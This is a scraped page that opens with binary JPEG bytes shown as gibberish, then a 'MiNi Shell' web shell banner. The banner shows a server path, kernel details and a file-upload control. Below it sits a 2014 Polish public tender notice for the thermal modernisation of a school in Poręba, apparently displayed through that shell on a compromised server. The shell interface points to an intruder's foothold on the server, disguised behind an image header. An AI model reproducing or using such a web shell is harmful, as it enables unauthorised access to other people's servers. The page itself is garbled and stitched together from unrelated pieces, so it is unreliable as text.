JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140612/198934-N-2014.html

<p class="kh_header"><b>Zawiercie: Termomodernizacja budynku Zespołu Szkół w Porębie,  42-480 Poręba  , ul. Zakładowa 1 .</b><br>
<b>Numer ogłoszenia: 198934 - 2014; data zamieszczenia: 12.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Zawierciański - Zespół Obsługi Ekonomiczno-Administracyjnej Szkół i Placówek Oświatowo-Wychowawczych w Zawierciu działający w imieniu i na rzecz szkół i placówek oświatowo-wychowawczych prowadzonych przez Powiat Zawierciański. , ul. Macieja Rataja 29a, 42-400 Zawiercie, woj. śląskie, tel. 032 6710254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoeas.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Zespołu Szkół w Porębie,  42-480 Poręba  , ul. Zakładowa 1 ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> - wyburzenie schodów przy boisku  szkolnym 
- demontaż  elementów  zamontowanych  na elewacji  przed przystąpieniem   do docieplenia  , ewentualne  dostosowanie do nowych wymiarów  oraz ponowny  montaż  po zakończeniu prac , elementy instalacji elektrycznej ,oświetleniowej , alarmowej , antenowej , telefonicznej  należy  uporządkować ,  ułożyć w korytach  i umocować na ścianie .
-  demontaż kolidujących elementów  odwodnienia  wody deszczowej , przeróbka odpływów - dostosowanie  do  nowych warunków  oraz ich ponowny montaż 
-  wymiana drewnianej stolarki  okiennej na  stolarkę z PCV z  nawiewnikami 
-   wymianę   parapetów wewnętrznych 
-  wymiana starej stolarki drzwiowej  na PCV  oraz aluminiową 
-  montaż rolet okiennych  nadstawnych  
-  ocieplenie  ścian  zewnętrznych styropianem  samogasnącym  EPS 70-040 Fasada gr. 12 cm( budynek główny, łącznik,   zaplecze przy sali gimnastycznej) oraz gr. 5 cm. budynek sali gimnastycznej,  za pomocą  kleju do  styropianu  i mocowanych  systemowymi  łącznikami  mechanicznymi  do styropianu z trzpieniem  z tworzywa   
-  izolacja termiczna  ościeży   z płyt styropianowych gr. 2 cm mocowana do podłoża za pomocą  kleju do styropianu .
-  wykonanie warstwy  zbrojonej siatką  z włókna szklanego  zatopioną w warstwie  kleju do  wykonywania warstwy zbrojonej 
-  wykonanie dodatkowej warstwy  siatki na poziomie  parteru do wysokości 2 m 
-  ułożenie podkładowej masy tynkarskiej  pod wyprawę tynkarską  , tynk akrylowy  cienkowarstwowy  o strukturze nakrapianej  tzw. baranek  o grubości ziarna 2 mm  , cokół należy wykończyć  tynkiem   mozaikowym  żywicznym ,  w kolorach zgodnych z projektem  kolorystyki . 
  -   oczyszczenie , izolacja  i ocieplenie fundamentów  styropianem  hydrofobowym gr . 8 cm.    w części  niepodpiwniczonej z   wykonaniem warstwy zbrojonej  siatką z włókna  szklanego  zatopioną w warstwie kleju   , założenie  folii kubełkowej  oraz ocieplenie na pełną wysokość  części  podpiwniczonej  ( wymiennikownia ). 
-  wykonanie dylatacji  z użyciem profili , masy  rozprężonej  oraz masy  silikonowej  
- wykonanie nowych obróbek blacharskich , rynien , rur spustowych na budynku   sali gimnastycznej i zaplecza , kominów ,   gzymsów, parapetów zewnętrznych oraz demontaż istniejących  i  montaż nowych obróbek blacharskich  ogniomurów na budynku głównym , naprawa kominów na budynku głównym  tj obłożenie styropianem i  wykonanie wyprawy z tynku akrylowego .
- demontaż i ponowny montaż rur spustowych na budynku głównym oraz pomalowanie  ich  oraz rynien i obróbek blacharskich w kolorze zgodnym z projektem 
- ocieplenie stropodachu styropapą  gr. 18 cm  ( budynek sali gimnastycznej i   zaplecza 
- pokrycie dachu  dwuwarstwowe papą termozgrzewalną ( budynek Sali   gimnastycznej i zaplecze przy Sali gimnastycznej ) papa podkładowa  na osnowie  z włókniny  poliestrowej  gr.3 mm typ PYE PV 160 S  30   lub równoważna  oraz papa nawierzchniowa  modyfikowana SBS na osnowie  z włókniny poliestrowej gr. 5,2 mm typ PYE 250 S 50 SBS lub równoważna 
- przebudowa wejść do budynku wraz z podjazdem dla osób niepełnosprawnych 
-  wykonanie dojść  i chodników oraz opaski  z kostki betonowej gr.6 cm wykończonych obrzeżem 
- wykonanie schodów od wejścia głównego   z kostki betonowej na nasypie ,   wykonanie balustrady schodowej  
- wykonanie instalacji odgromowej budynku sali gimnastycznej i zaplecza
- dostosowanie pionowych zwodów  instalacji odgromowej  do montażu pod      warstwą   docieplenia , ukrycie ich  w rurach  elektroinstalacyjnych , montaż skrzynek probierczych 	( budynek  główny szkoły oraz łącznika) 
-  demontaż istniejących piłkochwytów  oraz wykonanie nowych piłko chwytów  i  ich montaż 
- wymiana starych opraw oświetlenia zewnętrznego ( parkowego )  na oprawy  do lamp sodowych  75 W , przemalowanie słupów oświetleniowych 

Załączone  przedmiary robót mają charakter poglądowy i pomocniczy  dla Wykonawców
W załączeniu: 
 -  projekty architektoniczno budowlane
 -  specyfikacje techniczne
 -  przedmiary 
Wszystkie nazwy własne materiałów i urządzeń użyte w dokumentacji przetargowej są podane przykładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard.

Jeśli w opisie przedmiotu zamówienia lub dokumentacji projektowej zostały wskazane znaki towarowe, patenty lub  pochodzenie materiałów należy je traktować, jako propozycje projektanta. Zamawiający dopuszcza zastosowanie równoważnych  systemów ocieplenia , materiałów i urządzeń w stosunku do zaprojektowanych z zachowaniem tych samych lub lepszych standardów technicznych, technologicznych i jakościowych. Ponadto zamienne materiały lub urządzenia przyjęte do wyceny: winny spełniać funkcję, jakiej mają służyć, winny być kompatybilne z pozostałymi urządzeniami, aby zespół urządzeń dawał zamierzony (zaprojektowany) efekt, nie mogą wpływać na zmianę rodzaju i zakresu robót budowlanych.
W przypadku  zastosowania  innego producenta  systemu docieplenia  niż zaproponowany  w projekcie , Wykonawca  indywidualnie  i na własny koszt  uzgodni kolorystykę  z  autorem projektu. 

Roboty  prowadzone będą  w czynnym  budynku   szkoły .Wykonawca będzie zobowiązany   do wykonywania  prac w czasie  i w sposób  nie kolidujący  z działalnością  szkoły. Roboty generujące  znaczny  hałas  prowadzone będą  poza  godzinami pracy szkoły . Wykonawca  będzie zobowiązany  do bieżącego (codziennego) sprzątania  po robotach budowlanych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.20-8, 45.32.10.00-3, 45.32.40.00-4, 45.45.30.00-7, 45.45.00.00-6, 45.26.19.20-9, 45.26.13.20-3, 45.42.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium  w wysokości:  25.000 zł  (słownie ; dwadzieścia pięć tysięcy złotych )                              
Wadium musi obejmować okres  związania ofertą tj.: do dnia 26.07.2014  r.  Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w  art. 45 ust. 6 ustawy, tj.:
1)  pieniądzu,
2)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo       -    kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)  gwarancjach bankowych,
4)  gwarancjach ubezpieczeniowych,
5)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2. ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju      Przedsiębiorczości (Dz. U. Nr z 2007 Nr 42, poz. 275 z późn. zm.).
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert tj.; do dnia  27.06.2014r.  do godz.08:30 .
Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Bank BGŻ SA o/o w Zawierciu    Nr 88 2030 0045 1110 0000 0176 2660
W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu     potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w Zawierciu ul. M. Rataja 29a, w pok. Nr 6 lub dołączyć do oferty w osobnej kopercie .
Nie wniesienie wadium w terminie lub w sposób inny niż określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.
	
Zwrot lub zatrzymanie wadium nastąpi zgodnie z art. 46 Ustawy Prawo Zamówień Publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

Wykonawca potwierdza spełnianie  warunku poprzez  złożenie oświadczenia o spełnianiu      warunków udziału w postępowaniu  ( zał. nr 2. do SIWZ )</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że wykonał i prawidłowo ukończył w okresie ostatnich pięciu
lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest
krótszy - w tym okresie, roboty  budowlane polegające na : dociepleniu ścian  , wymianie stolarki  okiennej i drzwiowej , dociepleniu stopodachu lub stropu , wykonaniu instalacji odgromowej , wykonywaniu robot związanych z układaniem kostki betonowej na chodnikach  o łącznej wartości  minimum   600 000 zł .  

Zamawiający  dopuszcza  możliwość wykazania  powyższego zakresu rzeczowego i finansowego  na  różnych obiektach. Z tym ,że wartość robót związanych wymiana stolarki okiennej i drzwiowej ,  dociepleniem  ścian i stropów lub stropodachu  musi  łącznie wynosić minimum  400 000 zł .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
   Wykonawca potwierdza spełnianie  warunku poprzez  złożenie oświadczenia o           spełnianiu  warunków udziału w postępowaniu  ( zał. nr 2. do SIWZ )</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek w przypadku gdy Wykonawca wykaże,
że będzie dysponował w trakcie realizacji zamówienia:
-  jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej  lub odpowiadające  im ważne uprawnienia  budowlane w zakresie zamówienia , które zostały wydane  na podstawie  wcześniej obowiązujących przepisów 
-  jedną  osobą posiadającą uprawnienia do kierowania robotami budowlanymi o  specjalności  instalacyjnej w zakresie  instalacji i urządzeń elektrycznych i elektroenergetycznych , lub odpowiadające  im ważne uprawnienia  budowlane w zakresie zamówienia , które zostały wydane  na podstawie  wcześniej obowiązujących przepisów 

   zgodnie z przepisami Prawa budowlanego.

  Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych
  dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie
  wcześniej obowiązujących przepisów lub odpowiadające im kwalifikacje zawodowe    uprawniające do kierowania robotami budowlanymi w danej specjalności nabyte w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz w państwach Europejskiego Obszaru Gospodarczego, stosownie do przepisu art. 12 a ustawy Prawo budowlane oraz przepisów ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stawia następujący warunek szczegółowy w tym zakresie:
Zamawiający wymaga przedstawienia  opłaconej polisy lub innego dokumentu  na kwotę co najmniej 100.000zł potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca winien wykazać, że wykonał i prawidłowo ukończył w okresie ostatnich pięciu
lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest
krótszy - w tym okresie, roboty  budowlane polegające na : dociepleniu ścian  , wymianie stolarki  okiennej i drzwiowej , dociepleniu stopodachu lub stropu , wykonaniu instalacji odgromowej , wykonywaniu robot związanych z układaniem kostki betonowej na chodnikach  o łącznej wartości  minimum   600 000 zł .  

Zamawiający  dopuszcza  możliwość wykazania  powyższego zakresu rzeczowego i finansowego  na  różnych obiektach. Z tym ,że wartość robót związanych z  wymiana stolarki okiennej i drzwiowej ,  dociepleniem  ścian i stropów lub stropodachu  musi  łącznie wynosić minimum  400 000 zł .;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do SIWZ,
oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1. u.p.z.p., sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do SIWZ,
 Wycena  na realizację zamówienia  sporządzona na podstawie projektu architektoniczno - budowlanego ,  specyfikacji technicznych , opisu przedmiotu zamówienia  oraz pomocniczych przedmiarów ,załącznik nr 10
stosowne Pełnomocnictwo(a) - zgodnie z punktem 12.1.4 SIWZ,
w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, zgodnie z pkt.  7.1. SIWZ,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający nie  przewiduje możliwość dokonania zmian postanowień zawartej umowy z wyjątkiem zmiany wynagrodzenia wykonawcy  w następstwie zmiany przepisów   o podatku od towarów i usług  ( VAT). W przypadku ustawowej zmiany stawki podatku VAT  należne wykonawcy   z tytułu wykonania przedmiotu  umowy  wynagrodzenie  zostanie ustalone z uwzględnieniem  stawki wynikającej z obowiązujących przepisów . Zmiana wysokości  wynagrodzenia  dotyczyć będzie  robót wykonanych  po dacie  zawarcia aneksu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoeas.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zesp.Obsł.Ekon.-Admin Szkół i Plac.Oświat.-Wych. , 42-400 Zawiercie ,ul. Rataja 29 a, pokój nr 6. Koszt specyfikacji w wersji papier.100 zł . termin przygotow. 3 dni od złoż. zamów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2014 godzina 08:30, miejsce: Zespół Obsługi Ekonomiczno-Administracyjnej Szkół i Placówek  Oświatowo-Wychowawczych , 42-400 Zawiercie ,ul. Rataja 29 a, sekretariat, pokój nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




